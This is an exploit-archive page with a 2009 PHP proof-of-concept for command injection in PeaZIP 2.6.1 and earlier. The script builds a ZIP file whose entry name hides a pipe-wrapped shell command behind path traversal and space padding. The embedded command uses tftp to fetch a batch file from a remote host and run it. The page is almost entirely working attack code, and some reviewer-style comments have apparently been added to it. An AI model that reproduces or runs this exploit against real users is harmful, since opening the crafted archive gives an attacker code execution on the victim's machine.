
PeaZIP 2.6.1 Command Injection

PeaZIP 2.6.1 Command Injection
Posted Jun 5, 2009
Authored by Nine:Situations:Group | Site retrogod.altervista.org

Proof-of-concept exploit for a command injection via compressed filenames in PeaZIP versions 2.6.1 and below.

tags | exploit, proof of concept
SHA-256 | 7a1031d528d4e736b853742268e21241be84465070b23c6c7e45071ee9944dcd

PeaZIP 2.6.1 Command Injection

<?php
/*
PeaZIP <= 2.6.1 compressed filename command injection poc exploit
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/
software site: http://peazip.sourceforge.net/

tested against: peazip 2.5.1, 2.6.1 for Windows

a pipe vulnerability exists in the way PeaZIP handles file entries:
prepare the .zip file, open it with PeaZIP, then double-click the compressed text file,
and a cmd shell is launched ...
*/

# Command string that ends up inside the archive entry name (see the addFile()
# call at the bottom of the script). Per the author's note it cannot contain
# slashes or backslashes: addFile() rewrites '\' to '/', and '/' is the path
# separator inside a ZIP entry name.
$cmd = "tftp 192.168.0.1 GET pyro pyro.bat & pyro.bat";

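class zipfile
{
    /** @var list<string> Serialised local file header + deflated data, one per entry. */
    public array $datasec = [];
    /** @var list<string> Serialised central directory record, one per entry. */
    public array $ctrl_dir = [];
    /** End-of-central-directory signature followed by the two (zero) disk-number fields. */
    public string $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
    /** Byte offset at which the next local file header will be written. */
    public int $old_offset = 0;

    /**
     * Convert a Unix timestamp to the packed MS-DOS date/time used in ZIP headers.
     *
     * The calendar fields come from getdate(), i.e. the process' default timezone;
     * 0 means "now". Years before 1980 (the DOS epoch) cannot be represented and
     * are clamped to 1980-01-01 00:00:00.
     *
     * @return int 32-bit value: date in the high 16 bits, time (2-second resolution) in the low 16
     */
    public function unix2DosTime(int $unixtime = 0): int
    {
        $t = $unixtime === 0 ? getdate() : getdate($unixtime);

        if ($t['year'] < 1980) {
            $t = [
                'year' => 1980,
                'mon' => 1,
                'mday' => 1,
                'hours' => 0,
                'minutes' => 0,
                'seconds' => 0,
            ];
        }

        return (($t['year'] - 1980) << 25)
            | ($t['mon'] << 21)
            | ($t['mday'] << 16)
            | ($t['hours'] << 11)
            | ($t['minutes'] << 5)
            | ($t['seconds'] >> 1); // DOS stores seconds / 2
    }

    /**
     * Append one deflate-compressed entry to the archive.
     *
     * @param string $data uncompressed entry contents
     * @param string $name entry name; backslashes are normalised to '/'
     * @param int    $time Unix mtime, 0 for "now" (see unix2DosTime())
     *
     * @throws \RuntimeException if gzcompress() fails
     */
    public function addFile(string $data, string $name, int $time = 0): void
    {
        $name = str_replace('\\', '/', $name);

        // pack() writes the 4 little-endian bytes directly. The previous version
        // built a "\xNN..." string from dechex() and eval()'d it, which produced a
        // wrongly sized field whenever the value had fewer than 8 hex digits
        // (e.g. dates early in 1980) and ran eval() for no reason.
        $dostime = pack('V', $this->unix2DosTime($time));

        $unc_len = strlen($data);
        $crc = crc32($data);

        $zlib = gzcompress($data);
        if ($zlib === false) {
            throw new \RuntimeException('gzcompress() failed');
        }
        // gzcompress() emits a zlib stream; ZIP method 8 expects raw deflate, so
        // strip the 2-byte zlib header and the 4-byte Adler-32 trailer.
        $zdata = substr($zlib, 2, -4);
        $c_len = strlen($zdata);

        // Local file header followed by the deflated data.
        $fr = "\x50\x4b\x03\x04"
            . "\x14\x00"                // version needed to extract
            . "\x00\x00"                // general purpose bit flag
            . "\x08\x00"                // compression method: deflate
            . $dostime                  // last mod time and date
            . pack('V', $crc)           // crc-32
            . pack('V', $c_len)         // compressed size
            . pack('V', $unc_len)       // uncompressed size
            . pack('v', strlen($name))  // file name length
            . pack('v', 0)              // extra field length
            . $name
            . $zdata;
        $this->datasec[] = $fr;

        // Central directory record for the same entry.
        $cdrec = "\x50\x4b\x01\x02"
            . "\x00\x00"                    // version made by
            . "\x14\x00"                    // version needed to extract
            . "\x00\x00"                    // general purpose bit flag
            . "\x08\x00"                    // compression method: deflate
            . $dostime                      // last mod time and date
            . pack('V', $crc)               // crc-32
            . pack('V', $c_len)             // compressed size
            . pack('V', $unc_len)           // uncompressed size
            . pack('v', strlen($name))      // file name length
            . pack('v', 0)                  // extra field length
            . pack('v', 0)                  // file comment length
            . pack('v', 0)                  // disk number start
            . pack('v', 0)                  // internal file attributes
            . pack('V', 32)                 // external file attributes: DOS 'archive' bit
            . pack('V', $this->old_offset)  // offset of this entry's local header
            . $name;
        $this->old_offset += strlen($fr);

        $this->ctrl_dir[] = $cdrec;
    }

    /**
     * Serialise the archive: every entry, then the central directory, then the
     * end-of-central-directory record.
     *
     * @return string complete .zip file contents
     */
    public function file(): string
    {
        $entries = implode('', $this->datasec);
        $central = implode('', $this->ctrl_dir);
        $count = count($this->ctrl_dir);

        return $entries
            . $central
            . $this->eof_ctrl_dir
            . pack('v', $count)            // entries on this disk
            . pack('v', $count)            // entries overall
            . pack('V', strlen($central))  // size of the central directory
            . pack('V', strlen($entries))  // offset of the central directory
            . "\x00\x00";                  // .zip file comment length
    }
}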

$zipfile = new zipfile();
// A single entry whose *name* is the payload: leading "../" segments, a quoted
// "README.TXT" display name, then str_repeat() pads with spaces so that padding
// plus $cmd total 0xde bytes, followed by the command wrapped in '|' characters
// and a ".txt" suffix. Per the header comment PeaZIP hands such an entry name to
// a shell when the file is double-clicked, so the pipes make it run as a command.
// NOTE(review): if strlen($cmd) exceeds 0xde the str_repeat() count goes negative.
$zipfile -> addFile("lol","../../../../../../../\" README.TXT \" ".str_repeat("\x20",0xde - strlen($cmd))."\" | $cmd | .txt");
$dump_buffer = $zipfile -> file();
// NOTE(review): assert() is a no-op when zend.assertions is disabled, so a failed
// write would go unnoticed; an explicit `=== false` check would report it.
assert(file_put_contents("9sg.zip",$dump_buffer));
?>


